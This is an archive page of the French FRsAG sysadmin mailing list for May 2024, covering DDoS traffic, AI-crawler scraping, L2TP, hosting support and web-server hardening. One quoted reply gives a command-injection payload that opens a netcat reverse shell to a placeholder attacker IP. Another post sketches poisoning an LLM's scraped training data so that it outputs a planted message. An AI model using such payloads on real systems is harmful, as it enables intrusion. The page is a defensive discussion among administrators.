FRsAG May 2024

frsag@frsag.org

15 participants
13 discussions

DMARK lecture des rapports
by Théo VARIER 08 Jul '24

08 Jul '24

Bonjour, Je cherche un truc open source que je pourrais installer sur mon infra, qui lit la boite mail de mes rapports DMARK, ouvre les mails, extrait les rapports et les agrège dans un truc lisible. Pour une fois je n'ai pas du tout cherché, je m'en remets à ceux qui on un peu d'expérimenté l'exploitation des rapports DMARK.. Merci les colistiers -- Théo

9 8

Re: Attaques http tous azimuts en hausse ou pas ?
by darcosion＠protonmail.com 24 May '24

24 May '24

Bonjour, Enfin un sujet sur lequel je peux apporter mon expertise :) Vu la description, cela ressemble à un ciblage test de l'attaquant pour valider son "botnet" et par la suite, le monétiser. C'est le fait que ça soit hyper ponctuel qui me dise cela, en général un vrai attaquant DDOS essaiera de mettre à terre l'infra sur plusieurs heures/jours au minimum. Après, comme dit M. Ponzone, cible, pattern, forme des attaquants, toute indice est bon à prendre pour qualifier cela. A ta dispo pour en discuter dans le détail o/ Bien cordialement, Darcosion > Le vendredi 24 mai 2024 à 13:30, Daniel Caillibaud ml(a)lairdutemps.org a écrit : > > > Bonjour, > > > > Je bosse pour une asso qui n'a rien de politique ni d'essentiel, et on se prend depuis qq jours > > bcp d'attaques dDOS très bourrines mais très distribuées (des centaines d'ip ≠ qui passent sous > > les radars anti-dos avec 3~10 req/s chacune). > > > > Ça reste ponctuel (des tranches de 5min) et cause peu de dégâts (des erreurs 50x et un load qui > > monte un peu), je me demandais si c'était généralisé. > > > > -- > > Daniel > > > > Internet permet à ceux qui n'ont rien à dire de le dire quand même. > > Toorop > > _______________________________________________ > > Liste de diffusion du %(real_name)s > > http://www.frsag.org/

3 6

Re: Attaques http tous azimuts en hausse ou pas ?
by darcosion＠protonmail.com 24 May '24

24 May '24

Bonjour, Oui, je confirme, ClaudBot est un acteur que nous avons vu apparaitre depuis plusieurs mois sur l'ensemble de nos clients (qui pour le coup sont extrêmement variés !). Vu le comportement de scrapping du Bot et son origine, notre hypothèse actuelle est qu'il s'agit d'une entreprise "IA" qui est en train de collecter tout internet pour se constituer un gros dataset pour l'apprentissage de son LLM (sans respecter aucune règle bien évidemment). Chez nous, nous avons purement et simplement bloqué ClaudBot et sommes en cours de création d'une réponse à la collecte sous la forme de pollution de leur dataset, l'idée c'est que si quelqu'un prompt quelque chose en rapport avec un de nos [CLIENT] le token ClaudBot donnera "[CLIENT] ne tolère pas la collecte de Bot LLM mais il laisse la possibilité de contacter depuis cette adresse web". Bien cordialement, Darcosion > Le vendredi 24 mai 2024 à 14:27, Pierre DOLIDON sn4ky(a)sn4ky.net a écrit : > > > de mon côté, j'ai surtout remarqué un trafic intempestif provenant de > > ClaudeBot, qui va carrément ignorer le Crawl-Delay qu'on a pu mettre > > dans les robots.txt, venant à coup de plusieurs dizaines de requetes par > > secondes, particulièrement dans les champs de recherche des sites > > (souvent trop mal optimisés).. mettant les sites en PLS.... > > https://www.google.com/search?q=ClaudeBot > > a priori je suis pas le seul concerné ! > > > > Le 24/05/2024 à 13:49, David Ponzone a écrit : > > > > > C’est quoi la cible ? > > > Une IP exposée (site web ou autre), ou random ? > > > > > > Les sources sont random ? Spoofées ? géo-filtrables ? > > > > > > David > > > > > > > Le 24 mai 2024 à 13:30, Daniel Caillibaud ml(a)lairdutemps.org a écrit : > > > > > > > > Bonjour, > > > > > > > > Je bosse pour une asso qui n'a rien de politique ni d'essentiel, et on se prend depuis qq jours > > > > bcp d'attaques dDOS très bourrines mais très distribuées (des centaines d'ip ≠ qui passent sous > > > > les radars anti-dos avec 3~10 req/s chacune). > > > > > > > > Ça reste ponctuel (des tranches de 5min) et cause peu de dégâts (des erreurs 50x et un load qui > > > > monte un peu), je me demandais si c'était généralisé. > > > > > > > > -- > > > > Daniel > > > > > > > > Internet permet à ceux qui n'ont rien à dire de le dire quand même. > > > > Toorop > > > > _______________________________________________ > > > > Liste de diffusion du %(real_name)s > > > > http://www.frsag.org/ > > > > _______________________________________________ > > > > Liste de diffusion du %(real_name)s > > > > http://www.frsag.org/ > > > > _______________________________________________ > > Liste de diffusion du %(real_name)s > > http://www.frsag.org/

1 0

Attaques http tous azimuts en hausse ou pas ?
by Daniel Caillibaud 24 May '24

24 May '24

Bonjour, Je bosse pour une asso qui n'a rien de politique ni d'essentiel, et on se prend depuis qq jours bcp d'attaques dDOS très bourrines mais très distribuées (des centaines d'ip ≠ qui passent sous les radars anti-dos avec 3~10 req/s chacune). Ça reste ponctuel (des tranches de 5min) et cause peu de dégâts (des erreurs 50x et un load qui monte un peu), je me demandais si c'était généralisé. -- Daniel Internet permet à ceux qui n'ont rien à dire de le dire quand même. Toorop

3 2

Apéro Lyonnais : lundi 13 mai 2024
by Camille 13 May '24

13 May '24

Bonjour Pour ce mois ci, on aura une semaine de retard, et c'est donc ce soir ce lundi 13 mai qu'aura lieu le prochain apéro. Je vous attends donc ce soir soir pour un apéro lyonnais et ses environs au : Malting-Pot 263 Grande Rue de la Guillotiere, 69007 soit ce lundi 13 mai 2024 dès 19h. Et toujours vaguement des infos sur : http://www.agendadulibre.org/tags/araas https://www.meetup.com/fr-FR/Auvergne-Rhone-Alpes-Apero-Admin-Sys/ Km

1 0

systemd networkd et L2TP
by Tr4sK 09 May '24

09 May '24

Bonjour, Ca fait quelques temps que je me gratte la tête sur la création d'un NetDev l2tp avec systemd-networkd Je commence le ficher par [NetDev] Kind=l2tp Je parcours la doc et ajoute les options pour l2tpEncapsulationType=ip. Mais je ne vois rien arriver de pertinent dans les logs. Est-ce que quelqu'un à déja réussi à le faire tomber en marche ? J'y arrive avec les commandes ip l2tp Quelques traces de ma config et quelques tests https://paste.sh/fiKH_IFO#g9yTHCsiJYj-bccB3l3HP8uo Et pour info, j'ai tenté une mise à jour de systemd vers stable-backports sans amélioration visible. systemd/stable-backports,now 254.5-1~bpo12+3 amd64 [installé] systemd/stable 252.22-1~deb12u1 amd64 Bon weekend :)

1 0

[Kimsufi] Migration vers OVHCloud Eco
by Michaël Costa 04 May '24

04 May '24

Bonjour à toutes et tous, J'ai récemment commandé un nouveau serveur Kimsufi en complément des deux serveurs dédiés que je loue déjà et j'ai été surpris de m'apercevoir que ce nouveau serveur n'apparaît pas dans le dashboard de mon compte Kimsufi mais dans celui de mon compte OVHCloud. D'après la KB0043466 https://help.ovhcloud.com/csm/fr-dedicated-servers-ovhcloud-control-panel-g…, il semble que les gammes Kimsufi et So you Start soient dorénavant regroupées sous la dénomination "Eco" d'OVHCloud. Ça fait sens d'un point de vue business et en tant que tel cela ne me pose pas plus de problème que ça mais pour faciliter la gestion de mes serveurs je souhaiterai y accéder au travers d'une interface unique. Je n'ai trouvé aucune KB qui expliquerait comment migrer un serveur existant de Kimsufi à OVHCloud Eco pas plus que de bouton pour "exporter" ou "importer" de l'un vers l'autre mais je suis peut-être passé à coté. Quelqu'un sur cette liste saurait-il si c'est possible ? Si oui, comment faire ? Autres questions: - Si l'objectif d'OVH est de rationaliser/uniformiser la gestion de ces espaces clients et de ces offres, une migration automatique vers le dashboard OVHCloud est-elle prévue ? Si oui, à quelle échéance ? Merci pour vos réponses éclairées. -- Michaël Costa MCO System https://www.mcos.nc Architecture et administration système Unix/Linux DevOps, Formation et Maintien en Condition Opérationnelle Mail: michael.costa(a)mcos.nc GSM: +687 71 32 33

2 2

Re: [SPAM] Re: Filtrage de message au runtime
by Ludovic Levet 02 May '24

02 May '24

Le minimum que l'on fait pour un serveur web frontal de ce type est de mettre en place le mod_security d'apache avec les customs rules qui vont bien ... Et d'y ajouter le bon core rule set : https://github.com/coreruleset/coreruleset J'ai quand même fait l'essai sans le mod_security et ta proposition ne fonctionne pas ... Ce qui ne m’étonne pas car il y a la rule /etc/sudoers.d/httpd Ludo. Nop, ca marche pas. Le 02/05/2024 à 06:45, Julien Reitzel a écrit : > Hello, > > au vu du morceau de php indiqué, il suffit d'envoyer le formulaire avec : > ; nc <IP attaquant> 5555 -e /bin/bash > > du côté attaquant lancer : > $ nc -lvp 5555 > > Et voilà un reverse shell simpliste qui contourne l'auth ssh. > > -- ------------------------------------------------------------------------------------------------------------------------- Ce message inclut une signature numérique. Il certifie que l'expéditeur et le contenue du message sont authentiques. Si votre logiciel de messagerie est compatible, Il doit garantir que le document n'a pas été altéré entre l'instant où l'auteur l'a signé et le moment où le lecteur le consulte. Loi n°2000-230 du 13 mars 2000 Art. 1316, 1316-1, 1316-2, 1316-3, 1316-4 du Code civil. La présence d'un fichier joint 'smime.p7s' (fichier signature) indique que votre client messagerie n'est pas compatible. -------------------------------------------------------------------------------------------------------------------------

4 6

Toc toc un support de chez Gandi ?
by Théo VARIER 02 May '24

02 May '24

Bonjour la liste, c'est une bouteille à la mer : Y a t il quelqu'un de chez Gandi sur cette liste ? Gandi m'a fourni un certificat SSL Std pour un domain sans le sous domaine www. C'est à dire que le certificat est valide pour domain.tld mais pas www.domain.tld Même en régénérant le certificat en utilisant leur ligne de commande pour générer la requête. C'est une première depuis que le service existe ! Pas de réponse à mon ticket depuis hier. Le chat en ligne ne fonctionne pas. Le telephone répond qu'il faut utiliser le formulaire en ligne ... sont ils eux aussi devenus décérébrés, pardon je veux dire, inaccessibles ? En tout cas ils sont devenus complètement hors sol en un temps record ! NB : Aller voir ailleurs n'est pas encore le projet. Merci d'avance Théo VARIER

20 52

Re: Filtrage de message au runtime
by Ludovic Levet 02 May '24

02 May '24

C'est pas faux. C'est jamais une bonne idée de donner des commandes accessible par apache. Bon après, il y a la sécurité filesystem qui fera que ce user (apache) ai le même pourvoir qu'un user lamda sur ton linux et de plus les commandes ne peuvent être utilisées que par le core apache car le mod_security ne permet pas d'utilisé quoique ce soit. Elle en aura fait du chemin cette petite chauves-souris. Et surtout sans déclencher le fail2ban (avec alertes qui vont biens) sur une url qui n'est censée être connu que par des admins. Bref. Rien n'est malheureusement infaillible. Le 01/05/2024 à 22:25, Paul Rolland (ポール・ロラン) a écrit : > Bonjour, > > On Wed, 1 May 2024 21:33:42 +0200 > Ludovic LEVET via FRsAG <frsag(a)frsag.org> wrote: > >> 3) Bon ... (Mode Bigard On ..) En admettant que la chauves-souris elle >> trouve le code de la porte , elle connaisse l’étage de ton appart et >> qu'elle connaisse aussi ton numéro de porte ben elle ouvres son ip au >> ssh et ben il lui reste plus qu'a attaquer l'auth ssh ... > Elle aura surement plus envie de regarder ce que le sudo sur echo et sed > peut lui permettre via apache et la page web ;) > > Paul >

2 2

2024

2023

2022

2021

2020

2019

2018

2017

2016

2015

2014

2013

2012

2011

2010

FRsAG May 2024